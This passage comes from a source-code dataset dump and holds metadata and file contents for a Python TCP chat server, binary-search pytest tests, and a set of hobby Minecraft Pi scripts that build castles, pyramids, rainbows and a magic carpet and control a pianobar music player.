client.close()\r\n\r\nsocket.close()\r\n\r\n" }, { "alpha_fraction": 0.45978879928588867, "alphanum_fraction": 0.4634443521499634, "avg_line_length": 19.61403465270996, "blob_id": "26a53bedb53bb9d509c3069c095b4d6989a07856", "content_id": "b878e7badb29f900838c5892bb4419baaf7e85bf", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "permissive", "max_line_length": 82, "num_lines": 114, "path": "/SERVER/src/client.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\n\r\nfrom random import randint\r\nfrom threading import Thread\r\nfrom json import dumps, loads\r\n\r\n\r\nclients = {}\r\n\r\n\r\n\r\nclass Client:\r\n \r\n\r\n\r\n\r\n \r\n def __init__(self, id:int, conn, addr) -> None:\r\n\r\n\r\n clients[str(id)] = self\r\n\r\n self.id = str(id)\r\n self.conn = conn\r\n self.addr = addr\r\n \r\n self.name = None\r\n self.linked = None\r\n\r\n\r\n\r\n self.thread = Thread(target=self.connect)\r\n self.thread.start()\r\n\r\n\r\n\r\n def connect(self):\r\n \r\n\r\n try:\r\n data = loads(self.conn.recv(1024).decode('utf-8'))\r\n if len(data) > 1:\r\n return self.disconnect()\r\n except:\r\n return self.disconnect()\r\n\r\n\r\n \r\n thread = Thread(target=self.message_handler, args=[data])\r\n\r\n thread.start()\r\n\r\n return self.connect()\r\n\r\n \r\n def send(self, content):\r\n try:\r\n self.conn.send(content.encode('utf-8'))\r\n except:\r\n return\r\n\r\n\r\n\r\n\r\n def message_handler(self, data):\r\n\r\n if self.name is None:\r\n if 'name' in data and len(data['name']) < 10:\r\n self.name = data['name']\r\n print(f\"{self.id} : {self.name}\")\r\n else:\r\n self.disconnect()\r\n\r\n\r\n if 'connect' in data:\r\n if self.linked is not None:\r\n return self.disconnect() \r\n\r\n\r\n if data['connect'] not in clients or data['connect'] == self.id:\r\n self.send('invalid id')\r\n return self.disconnect()\r\n\r\n else:\r\n self.linked = clients[data['connect']]\r\n\r\n if self.linked.linked != self:\r\n self.send('Waiting for connection...')\r\n # self.linked.send('Someone connected to you! ID: {self.id}!')\r\n else:\r\n self.send('Connected!')\r\n self.linked.send(\"Connected!\")\r\n\r\n elif 'message' in data:\r\n if not self.linked:\r\n self.send('invalid id')\r\n self.disconnect()\r\n if self.linked.linked == self:\r\n self.linked.send(dumps({'message':{self.name:data['message']}}))\r\n\r\n def disconnect(self):\r\n try:\r\n del clients[self.id]\r\n return self.conn.close()\r\n except:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Admin(Client):\r\n pass" } ]
3
heidichen/cs207test
https://github.com/heidichen/cs207test
bf16b936e89ba49e1211a9b2dca57e1184f0eb7a
8ba4be34e42c9e84f56cb32d93a8ecdac755d5ba
2b9a4f770a13425907fc60236f340c2cc8a4acc7
refs/heads/master
2021-01-12T17:06:59.640250
2016-09-30T14:03:32
2016-09-30T14:03:32
69,055,550
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7348993420600891, "alphanum_fraction": 0.7852349281311035, "avg_line_length": 58.79999923706055, "blob_id": "b5c79129198d0ef0f89f0105d7d4184a6c38484a", "content_id": "c8ba029e8e5da95b1daeb478b4fde4d016bf064e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 298, "license_type": "no_license", "max_line_length": 162, "num_lines": 5, "path": "/README.md", "repo_name": "heidichen/cs207test", "src_encoding": "UTF-8", "text": "# cs207test\n\n[![Build Status](https://travis-ci.org/heidichen/cs207test.svg?branch=master)](https://travis-ci.org/heidichen/cs207test)\n\n[![Coverage Status](https://coveralls.io/repos/github/heidichen/cs207test/badge.svg?branch=master)](https://coveralls.io/github/heidichen/cs207test?branch=master)" }, { "alpha_fraction": 0.6155914068222046, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 22.25, "blob_id": "2dfa0c5600f35fbd8e71c773248b688221d37f3c", "content_id": "7047e1054bc915fc6b3cd0d31766ebf023c9bf45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 40, "num_lines": 16, "path": "/test_binsearch.py", "repo_name": "heidichen/cs207test", "src_encoding": "UTF-8", "text": "from pytest import raises\nfrom binsearch import binary_search\n\ndef test_binsearch():\n input = list(range(10))\n assert binary_search(input, 5) == 5\n\ndef test_char_binsearch():\n with raises(TypeError):\n binary_search(['a', 3])\n\ndef test_binary_empty():\n asset binary_search([], 1) == -1\n\ndef test_binary_noitem():\n asset binary_search([3, 4], 1) == -1\n" } ]
2
Cody-Coleman/minecraft-scripts
https://github.com/Cody-Coleman/minecraft-scripts
cb2a0edb35c6c2dd9f90ad140f11b1e73e143398
d90a646426f4d807de43919161fd752d5fa008c8
536a730adbcfe59e3fc7231a3fa0ce6c0804ca9d
refs/heads/master
2020-03-30T05:17:27.474645
2018-12-13T00:56:56
2018-12-13T00:56:56
150,790,894
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5867970585823059, "alphanum_fraction": 0.5897310376167297, "avg_line_length": 30.461538314819336, "blob_id": "dfcbd15233a8dd5ea97cf59c0460f4ec6744341c", "content_id": "175682b58e2e7f4ff903e070094b9557aa84ebf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2045, "license_type": "no_license", "max_line_length": 122, "num_lines": 65, "path": "/detectors/hit_detector.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "from threading import Thread\nfrom time import sleep\nfrom mcpi.minecraft import Minecraft\n\n\nclass HitDetector:\n \"\"\"\n Class that can take any number of check_hits functions and spins off a thread to process them,\n passing the list of hit blocks data\n \"\"\"\n def __init__(self):\n \"\"\"\n Init the class with an empty check_list, and various flags\n \"\"\"\n self.check_list = []\n self.running = True\n self.t1 = None\n self.mc = Minecraft.create()\n\n def check_on(self):\n \"\"\"\n Starts the checker, setting the flag to true, creating the thread, and starting it.\n Needs to clear out all previous events first.\n :return:\n \"\"\"\n self.mc.events.clearAll()\n self.running = True\n self.t1 = Thread(target=self.check_hits)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def check_hits(self):\n \"\"\"\n Gets all the events and then loops through all the functions that could be matches to this.\n Would be smarter to thread this out further as well.\n :return:\n \"\"\"\n while self.running:\n sleep(0.5)\n hits = self.mc.events.pollBlockHits()\n for func in self.check_list:\n func(hits)\n\n def check_off(self):\n \"\"\" Simple command disables all checks \"\"\"\n self.running = False\n\n def add_check(self, func):\n if not self.running:\n self.check_list.append(func)\n else:\n print(\"You cannot add a new check to the already running checker. Stop it first then add a check\")\n\n def del_check(self, func):\n if not self.running:\n self.check_list.remove(func)\n else:\n print(\"You cannot remove a check to an already running checker. Stop it first then add a check\")\n\n def __del__(self):\n \"\"\"\n shut down the threads. Calling the check_off in case there is more that needs / wants to be added to the shut down\n :return:\n \"\"\"\n self.check_off()\n" }, { "alpha_fraction": 0.5493061542510986, "alphanum_fraction": 0.5693860650062561, "avg_line_length": 35.030303955078125, "blob_id": "daf6ef37808f385db2f1f7904ad6320cf04b7115", "content_id": "9ce4e38d048e44446eba05abdcf835d18e1bf3e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9512, "license_type": "no_license", "max_line_length": 113, "num_lines": 264, "path": "/builds/castle.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# --------------------------------------\n#\n# Minecraft Python API\n# Castle Builder\n#\n# This script creates a castle complete\n# with moat and perimeter walls.\n#\n# Author : Matt Hawkins\n# Date : 07/06/2014\n#\n# https://www.raspberrypi-spy.co.uk/\n#\n# --------------------------------------\n\n# Import Minecraft libraries\nimport sys\nfrom mcpi.minecraft import Minecraft\nimport mcpi.block as block\nfrom time import sleep\n\n\n# mc.postToChat(\"Let's build a castle!\")\n\n\n# --------------------------------------\n# Define Functions\n# --------------------------------------\ndef create_walls(mc, posx, posy, posz, size, height, material=block.STONE_BRICK.id, modifier=1, battlements=True,\n walkway=True):\n \"\"\"\n Creates 4 walls in a box, that are size long and height tall out of material\n :param mc: Minecraft client\n :param posx: The starting x position\n :param posy: The starting y position\n :param posz: The starting z position\n :param size: How long to make the walls\n :param height: How high to make the walls\n :param material: What to make the walls out of, defaults to mossy stone brick\n :param modifier: If the block takes a modifier\n :param battlements: If set will add battlements to the wall\n :param walkway: If set will add a walkway to the wall\n :return:\n \"\"\"\n # mc.postToChat(\"Creating Walls\")\n # WALL 1\n mc.setBlocks(posx - size, posy + 1, posz - size, posx + size, posy + height, posz - size, material, modifier)\n # WALL 2\n mc.setBlocks(posx - size, posy + 1, posz - size, posx - size, posy + height, posz + size, material, modifier)\n # WALL 3\n mc.setBlocks(posx + size, posy + 1, posz + size, posx - size, posy + height, posz + size, material, modifier)\n # WALL 4\n mc.setBlocks(posx + size, posy + 1, posz + size, posx + size, posy + height, posz - size, material, modifier)\n sleep(5)\n\n if battlements:\n # mc.postToChat(\"Creating battlements\")\n for i in range(0, (2 * size) + 1, 2):\n # WALL 1\n mc.setBlock(((posx - size) + i), posy + height + 1, posz - size, material, modifier)\n mc.setBlock(((posx - size) + i), posy + height + 2, posz - size, block.TORCH.id, 5)\n # WALL 2\n mc.setBlock(posx - size, posy + height + 1, ((posz - size) + i), material, modifier)\n mc.setBlock(posx - size, posy + height + 2, ((posz - size) + i), block.TORCH.id, 5)\n\n # WALL 3\n mc.setBlock(((posx - size) + i), posy + height + 1, posz + size, material, modifier)\n mc.setBlock(((posx - size) + i), posy + height + 2, posz + size, block.TORCH.id, 5)\n\n # WALL 4\n mc.setBlock(posx + size, posy + height + 1, ((posz - size) + i), material, modifier)\n mc.setBlock(posx + size, posy + height + 2, ((posz - size) + i), block.TORCH.id, 5)\n sleep(5)\n\n if walkway:\n # mc.postToChat(\"Creating Walkways\")\n # WALL 1\n mc.setBlocks(posx - size + 1, posy + height - 1, posz - size + 1,\n posx + size - 1, posy + height - 1, posz - size + 1,\n block.STONE_SLAB.id, 2)\n # WALL 2\n mc.setBlocks(posx - size + 1, posy + height - 1, posz - size + 1,\n posx - size + 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n # WALL 3\n mc.setBlocks(posx + size - 1, posy + height - 1, posz + size - 1,\n posx - size + 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n # WALL 4\n mc.setBlocks(posx + size - 1, posy + height - 1, posz - size + 1,\n posx + size - 1, posy + height - 1, posz + size - 1,\n block.STONE_SLAB.id, 2)\n sleep(5)\n\n\ndef create_landscape(mc, posx, posy, posz, size, moat_depth=3):\n \"\"\"\n Sets upper half to air and creates an island with a moat floating in the air\n :param mc: Minecraft client\n :param size: the initial size of everything, the island and moat are multiples of this\n :param posx: The starting x position for the island, where it will center on\n :param posy: The starting y position for the island\n :param posz: The starting z position for the island\n :param moat_depth: How deep the moat\n \"\"\"\n island_size = size * 2 + 3\n moat_size = (size * 2) + 6\n\n # Set upper half to air\n mc.postToChat(\"setting upper half to air\")\n mc.setBlocks(posx - moat_size, posy - 4, posz - moat_size,\n posx + moat_size, posy + 25, posz + moat_size, block.AIR.id)\n sleep(5)\n\n # Create water moat\n mc.postToChat(\"Setting up moat\")\n mc.setBlocks(posx - moat_size, posy, posz - moat_size,\n posx + moat_size, posy - moat_depth, posz + moat_size,\n block.WATER.id)\n\n sleep(5)\n\n # Set lower half of world to dirt with a layer of grass\n mc.postToChat(\"Creating Land\")\n mc.setBlocks(posx - island_size, posy, posz - island_size,\n posx + island_size, posy - 4, posz + island_size, block.DIRT.id)\n\n # create island\n mc.postToChat(\"Creating Grass\")\n mc.setBlocks(posx - island_size, posy, posz - island_size,\n posx + island_size, posy, posz + island_size, block.GRASS.id)\n\n\ndef create_keep(mc, posx, posy, posz, size, levels):\n \"\"\"\n Create a keep with specified number of floors and a roof\n :param mc: Minecraft Client\n :param posx: starting x position\n :param posy: starting y position\n :param posz: starting z position\n :param size: How wide to make it\n :param levels: How tall to make it\n \"\"\"\n # Create a keep with a specified number\n # of floors levels and a roof\n mc.postToChat(\"Creating Keep\")\n height = (levels * 6) + 5\n create_walls(mc, posx, posy, posz, size, height)\n # Floors and Windows\n for level in range(1, levels):\n mc.setBlocks(posx - size + 1, (level * 6) + posy, posz - size + 1,\n posx + size - 1, (level * 6) + posy, posz + size - 1,\n block.STONE_BRICK.id, 2)\n # Windows\n for level in range(1, levels):\n # WALL 1\n create_windows(mc, posx, (level * 6) + posy + 2, posz - size, \"S\")\n # WALL 2\n create_windows(mc, posx - size, (level * 6) + posy + 2, posz, \"W\")\n # WALL 3\n create_windows(mc, posx, (level * 6) + posy + 2, posz + size, \"N\")\n # WALL 4\n create_windows(mc, posx + size, (level * 6) + posy + 2, posz, \"E\")\n\n # DOOR ON SOUTH WALL\n mc.setBlocks(posx - 1, posy + 1, posz - size, posx + 1, posy + 2, posz - size, block.AIR.id)\n\n\ndef create_windows(mc, posx, posy, posz, direction):\n \"\"\"\n Creates windows in keep\n :param mc: the minecraft client\n :param posx: x starting position\n :param posy: y starting position\n :param posz: z starting position\n :param direction: what direction this is facing\n \"\"\"\n if direction == \"N\" or direction == \"S\":\n z1 = posz\n z2 = posz\n z3 = posz\n x1 = posx - 5\n x2 = posx + 5\n x3 = posx\n if direction == \"E\" or direction == \"W\":\n z1 = posz - 5\n z2 = posz + 5\n z3 = posz\n x1 = posx\n x2 = posx\n x3 = posx\n mc.setBlocks(x1, posy, z1, x1, posy + 1, z1, block.GLASS_PANE.id)\n mc.setBlocks(x2, posy, z2, x2, posy + 1, z2, block.GLASS_PANE.id)\n mc.setBlocks(x3, posy, z3, x3, posy + 1, z3, block.GLASS_PANE.id)\n if direction == \"N\":\n a = 3\n if direction == \"S\":\n a = 2\n if direction == \"W\":\n a = 0\n if direction == \"E\":\n a = 1\n mc.setBlock(x1, posy - 1, z1, 109, a)\n mc.setBlock(x2, posy - 1, z2, 109, a)\n mc.setBlock(x3, posy - 1, z3, 109, a)\n\n\ndef create_castle(mc, posx, posy, posz, size=10):\n \"\"\"\n Creates the castle in the sky, uses the initial positions and size to determine all other values\n :param mc: minecraft client\n :param size: How big the keep is, affects the island, walls and moat as a result\n :param posx: where the x center should start\n :param posy: where the y should start, castle then moves up 10 spaces\n :param posz: where the z center should start\n \"\"\"\n # first create landscape\n # posy = posy+10\n mc.postToChat(\"Creating Landscape\")\n create_landscape(mc, posx, posy, posz, size)\n # next create walls\n mc.postToChat(\"Creating border walls\")\n create_walls(mc, posx, posy, posz, size * 2, 6)\n mc.postToChat(\"Creating Keep\")\n create_keep(mc, posx, posy, posz, size, 5)\n\n\nif __name__ == '__main__':\n minecraft_client = Minecraft.create(sys.argv[1])\n pos = minecraft_client.player.getPos()\n if len(sys.argv) > 2:\n positions = sys.argv[2].split(',')\n pos_x = int(pos.x)\n pos_y = int(pos.y)\n pos_z = int(pos.z)\n else:\n pos_x = int(pos.x)\n pos_y = int(pos.y)\n pos_z = int(pos.z)\n create_castle(minecraft_client, pos_x, pos_y, pos_z)\n# --------------------------------------\n#\n# Main Script\n#\n# --------------------------------------\n# pos = mc.player.getPos()\n# x = pos.x\n# y = pos.y\n# z = pos.z\n#\n# print(\"Create ground and moat\")\n# # create_landscape(33, 10, 23)\n#\n# print(\"Create outer walls\")\n# create_walls(x, y, z, 21, 5, block.STONE_BRICK, True, True)\n#\n# print(\"Create inner walls\")\n# create_walls(x, y, z, 13, 6, block.STONE_BRICK, True, True)\n#\n# print(\"Create Keep with 4 levels\")\n# create_keep(x, y, z, 5, 4)\n#\n# print(\"Position player on Keep's walkway\")\n" }, { "alpha_fraction": 0.5329670310020447, "alphanum_fraction": 0.5700549483299255, "avg_line_length": 29.33333396911621, "blob_id": "89779e1aa3033188b08dd795eb40ef1d2dc31684", "content_id": "d8c5b520a43ea372b60c43f60473eb59eaee020c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/builds/rainbow.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import math\nimport time\nimport mcpi.block as block\n\nrainbow = [14, 1, 4, 13, 11, 10, 2]\n\n\ndef create_rainbow(mc, pos, radius=30):\n \"\"\"\n Creates a rainbow in the sky, handy when trying to mark spots\n :param mc: Minecraft client\n :param pos: position to start at, +3 for x, and z so it's not on top of you\n :param radius: how round to make the rainbow\n \"\"\"\n x = int(pos.x) + 3\n y = int(pos.y)\n z = int(pos.z) + 3\n\n for angle in range(360):\n for i in range(len(rainbow)):\n j = x + (radius - i) * math.cos(angle * math.pi / 180)\n k = y + (radius - i) * math.sin(angle * math.pi / 180)\n mc.setBlock(j, k, z, block.WOOL.id, rainbow[i])\n time.sleep(0.1)\n" }, { "alpha_fraction": 0.521449863910675, "alphanum_fraction": 0.5437026619911194, "avg_line_length": 35.0247917175293, "blob_id": "cd90d2479643f380ef5747f3218f56329115998c", "content_id": "6483c49f4247b76674f517696173301d385909af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4359, "license_type": "no_license", "max_line_length": 107, "num_lines": 121, "path": "/builds/record_player.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom mcpi.minecraft import Minecraft, Vec3\nfrom mcpi import block\nfrom time import sleep\nfrom threading import Thread\nimport subprocess\nimport sys\n\n\ndef matchVec3(vec1, vec2):\n if int(vec1.x) == int(vec2.x) and int(vec1.y) == int(vec2.y) and int(vec1.z) == int(vec2.z):\n return True\n else:\n return False\n\n\nclass RecordPlayer():\n def __init__(self, x, y, z):\n # Thread.__init__(self)\n self.running = True\n self.x = x\n self.y = y\n self.z = z\n self.running = True\n self.t1 = None\n self.proc = None\n # PERHAPS BUILD THE RECORD PLAYER IN THE INIT\n\n def on(self):\n self.running = True\n if self.proc is None:\n self.proc = subprocess.Popen(['pianobar'], stdout=subprocess.PIPE, shell=True)\n else:\n proc = subprocess.Popen(\"echo ' ' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n self.t1 = Thread(target=self.lights)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def lights(self):\n while self.running == True:\n # START UP PANDORA\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 1)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 1)\n sleep(0.25)\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n sleep(0.25)\n\n def off(self):\n self.running = False\n # STOP PANDORA\n print(\"Got stop command\")\n if self.proc is not None:\n print(\"proc is not None\")\n proc = subprocess.Popen(\"echo ' ' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n mc.setBlock(self.x + 2, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n mc.setBlock(self.x - 1, self.y + 1, self.z + 2, block.NETHER_REACTOR_CORE.id, 2)\n\n def next(self):\n # SKIP SONG\n if self.proc is not None:\n proc = subprocess.Popen(\"echo 'n' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n def check_player(self, hit_list):\n for hit in hit_list:\n if matchVec3(hit.pos, Vec3(self.x, self.y + 1, self.z + 2)):\n block_data = mc.getBlockWithData(hit.pos)\n if block_data.id == 96 and block_data.data == 7:\n mc.postToChat(\"stopping record player\")\n self.off()\n break\n elif block_data.id == 96 and block_data.data == 3:\n mc.postToChat(\"starting record player\")\n self.on()\n break\n elif matchVec3(hit.pos, Vec3(self.x + 1, self.y, self.z + 2)):\n block_data = mc.getBlockWithData(hit.pos)\n if block_data.id == 47:\n mc.postToChat(\"changing song\")\n self.next()\n break\n\n def quit_player(self):\n print(\"Got quit command\")\n proc = subprocess.Popen(\"echo 'q' > ~/.config/pianobar/ctl\", shell=True, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n#\n# # GET INITIAL POSITIONS AND CONNECTIONS\n# mc = Minecraft.create()\n# pos = mc.player.getPos()\n# x, y, z = int(pos.x), int(pos.y), int(pos.z)\n#\n# # CREATE RECORD PLAYER\n# mc.setBlock(x, y, z + 2, block.CRAFTING_TABLE.id)\n# mc.setBlock(x, y + 1, z + 2, 96, 7)\n# # REMEMBER THE LIDS LOCATION\n# lid = Vec3(x, y + 1, z + 2)\n#\n# mc.setBlock(x - 1, y, z + 2, 49)\n# mc.setBlock(x - 1, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x + 1, y, z + 2, 47)\n# mc.setBlock(x + 2, y, z + 2, 49)\n# mc.setBlock(x + 2, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x - 1, y + 2, z + 2, block.OBSIDIAN.id)\n# mc.setBlock(x + 2, y + 2, z + 2, block.OBSIDIAN.id)\n#\n# record = recordPlayer(x, y, z)\n# hd = hitDetector()\n# hd.add_check(record.check_player)\n# hd.check_on()\n#\n# while True:\n# try:\n# sleep(1)\n# except KeyboardInterrupt:\n# record.quit_player()\n# sys.exit()\n" }, { "alpha_fraction": 0.5952000021934509, "alphanum_fraction": 0.6058666706085205, "avg_line_length": 41.6136360168457, "blob_id": "65a9f2e95b031d1270ae674cbd6b7b936ef9a193", "content_id": "a08e2dc449cfceac76192ed9b9df1a471c646c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "no_license", "max_line_length": 100, "num_lines": 44, "path": "/builds/pyramid.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import math\nfrom mcpi import block\n\n\ndef create_pyramid(mc, posx, posy, posz, width, base=block.COBBLESTONE.id, walls=block.SANDSTONE.id,\n top_block=block.GOLD_BLOCK.id):\n \"\"\"\n Creates a pyramid at the posx, posy and posz coordinates with a width and height\n :param mc: Minecraft Client\n :param posx: The starting X coordinate\n :param posy: The starting Y coordinate\n :param posz: The starting Z coordinate\n :param width: How wide the base of the pyramid is\n :param base: what type of block the base of the pyramid is\n :param walls: what type of block the walls of the pyramid is\n :param top_block: what type of block goes on the very top of the pyramid\n \"\"\"\n mc.postToChat(\"About to create pyramid!\")\n # May sure width is odd number so pyramid ends\n # with a single block\n if width % 2 == 0:\n width = width + 1\n height = int((width + 1) / 2)\n half_size = int(math.floor(width / 2))\n mc.postToChat(f\"Player : {posx} {posy} {posz}\")\n mc.postToChat(f\"Size : {width} Height : {height} Halfsize : {half_size}\")\n # Create base for pyramid\n print(\"Create solid base\")\n mc.setBlocks(posx - half_size - 2, posy - 2, posz - half_size - 2,\n posx + half_size + 2, posy - 2, posz + half_size + 2,\n block.DIRT.id)\n mc.setBlocks(posx - half_size - 2, posy - 1, posz - half_size - 2,\n posx + half_size + 2, posy - 1, posz + half_size + 2,\n base)\n # Create solid Pyramid\n print(\"Create Pyramid\")\n for i in range(posy, posy + height):\n mc.setBlocks(posx - half_size, i, posz - half_size,\n posx + half_size, i, posz + half_size,\n walls)\n half_size = half_size - 1\n # Change top block\n print(\"Set top block\")\n mc.setBlock(posx, posy + height - 1, posz, top_block)\n" }, { "alpha_fraction": 0.5053003430366516, "alphanum_fraction": 0.5242531299591064, "avg_line_length": 37.432098388671875, "blob_id": "0e2e0a6beb00f02542e32c95eb8e8ea2e08de393", "content_id": "f63f59c4625db9ed5a1bb79e009e70f30ae83986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3113, "license_type": "no_license", "max_line_length": 118, "num_lines": 81, "path": "/builds/magic_carpet.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\nfrom mcpi.minecraft import Minecraft, Vec3\nfrom threading import Thread\nimport mcpi.block as block\nimport time\n\n\nclass MagicCarpet:\n def __init__(self):\n \"\"\"\n initilize the carpet\n \"\"\"\n self.mc = Minecraft.create()\n self.mc.postToChat(\"Magic Carpet Activated\")\n self.block_list = []\n self.last_player_pos = self.mc.player.getPos()\n self.player_pos = Vec3(0, 0, 0)\n self.running = True\n self.t1 = None\n\n def match(self):\n return int(self.last_player_pos.x) == int(self.player_pos.x) \\\n and int(self.last_player_pos.y) == int(self.player_pos.y) \\\n and int(self.last_player_pos.z) == int(self.player_pos.z)\n\n def get_block_below(self, next_player_pos):\n block_below = Vec3(int(next_player_pos.x), int(next_player_pos.y), int(next_player_pos.z))\n if block_below.z < 0:\n block_below.z -= 1\n if block_below.x < 0:\n block_below.x -= 1\n block_below.y -= 1\n return block_below\n\n def start_carpet(self):\n self.running = True\n self.t1 = Thread(target=self.flying_carpet)\n self.t1.setDaemon(True)\n self.t1.start()\n\n def check_carpet(self, hit_list):\n for hit in hit_list:\n if self.mc.getBlock(hit.pos) == block.WOOL.id and len(self.block_list) > 0:\n # print(\"Checking on the carpet\")\n for carpet in self.block_list:\n # print(\"Cleaning up Carpet\")\n self.mc.setBlocks(carpet - Vec3(1, 0, 1), carpet + Vec3(1, 0, 2), block.AIR)\n time.sleep(2)\n break\n\n def flying_carpet(self):\n \"\"\"\n put a carpet under you\n :return:\n \"\"\"\n while self.running:\n self.player_pos = self.mc.player.getPos()\n mov_x = self.last_player_pos.x - self.player_pos.x\n mov_z = self.last_player_pos.z - self.player_pos.z\n if mov_x < -0.2 or mov_x > 0.2 or mov_z < -0.2 or mov_z > 0.2:\n # DETECTED HORIZONTAL MOVEMENT\n next_player_pos = self.player_pos\n while self.match():\n next_player_pos = Vec3(next_player_pos.x - mov_x,\n next_player_pos.y, next_player_pos.z - mov_z)\n block_below = self.get_block_below(next_player_pos)\n if self.mc.getBlock(block_below) == block.AIR.id:\n self.mc.setBlocks(block_below - Vec3(1, 0, 1), block_below + Vec3(1, 0, 2), 35, 10)\n self.block_list.append(block_below)\n if len(self.block_list) > 2:\n block_cleanup = self.block_list.pop(0)\n self.mc.setBlocks(block_cleanup - Vec3(1, 0, 1), block_cleanup + Vec3(1, 0, 2), block.AIR)\n self.last_player_pos = self.player_pos\n time.sleep(0.2)\n\n def stop_carpet(self):\n \"\"\"\n remove the carpet\n :return:\n \"\"\"\n self.running = False\n" }, { "alpha_fraction": 0.5566571950912476, "alphanum_fraction": 0.580736517906189, "avg_line_length": 27.239999771118164, "blob_id": "f75d7f89132b5969e6b527f8252a8a0e0d336c5e", "content_id": "f8f49083166f8fc7bdfdfdb261f22b3448c5a874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/detectors/sreact_detector.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python3\n\nimport sys\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nplayer_dict = {'waffleman1793': 13, 'kid_gamer_888': 6, 'jojo_pie': 5, 'yaboidatboi': 6}\naction_dict = {'joined': GPIO.HIGH, 'left': GPIO.LOW}\n\nif __name__ == '__main__':\n try:\n player_name = sys.argv[1].lower()\n if player_name in player_dict:\n pin = player_dict[player_name]\n else:\n pin = 22\n action = action_dict[sys.argv[2]]\n print(\"Player: {}\\tPin: {}\\tAction: {}\".format(player_name, pin, action))\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, action)\n except Exception as e:\n print(e)\n GPIO.cleanup()\n" }, { "alpha_fraction": 0.5770684480667114, "alphanum_fraction": 0.6014279723167419, "avg_line_length": 30.328947067260742, "blob_id": "6375edebe31ab617ff5660ca03371692c72324a7", "content_id": "10832d864d04e0f21cb582b5af1bca6755d30570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2381, "license_type": "no_license", "max_line_length": 93, "num_lines": 76, "path": "/launch_hacks.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "import sys\nimport random\nimport time\nfrom detectors.hit_detector import HitDetector\nfrom swords.swords import Sword\n\n\ndef type_output(sentence, speed=80):\n for letter in sentence:\n sys.stdout.write(letter)\n sys.stdout.flush()\n time.sleep(random.random() * 10.0 / (speed + 10))\n print(\"\\n\")\n\n\nif __name__ == '__main__':\n sword = Sword()\n hd = HitDetector()\n hd.add_check(sword.check_sword)\n sword_selection = {'1': 'normal', '2': 'lava', '3': 'water', '4': 'ice', '5': 'air'}\n sword.enable_sword()\n hd.check_on()\n while True:\n print(\"\\033c\")\n type_output(\"Welcome to the Minecraft Sword Arsenal selection screen\")\n type_output(\"Select your sword type from below\")\n type_output(\"1.) Normal Sword -> No special effects\")\n type_output(\"2.) Lava Sword -> Change blocks to flowing Lava\")\n type_output(\"3.) Water Sword -> Change blocks into flowing water\")\n type_output(\"4.) Ice Sword -> Change blocks into Ice\")\n type_output(\"5.) Air Sword -> Float Blocks\")\n sword_input = input(\"Select your Sword [1-5]: \")\n if sword_input not in sword_selection:\n pass\n else:\n type_output(\"You've selected {} sword type\".format(sword_selection[sword_input]))\n sword.set_sword_type(sword_selection[sword_input])\n\n\n# sword = air_sword()\n# sword.enable_sword()\n# hd = hitDetector()\n# hd.add_check(sword.check_air_sword)\n# hd.check_on()\n\n\n# # GET INITIAL POSITIONS AND CONNECTIONS\n# mc = Minecraft.create()\n# pos = 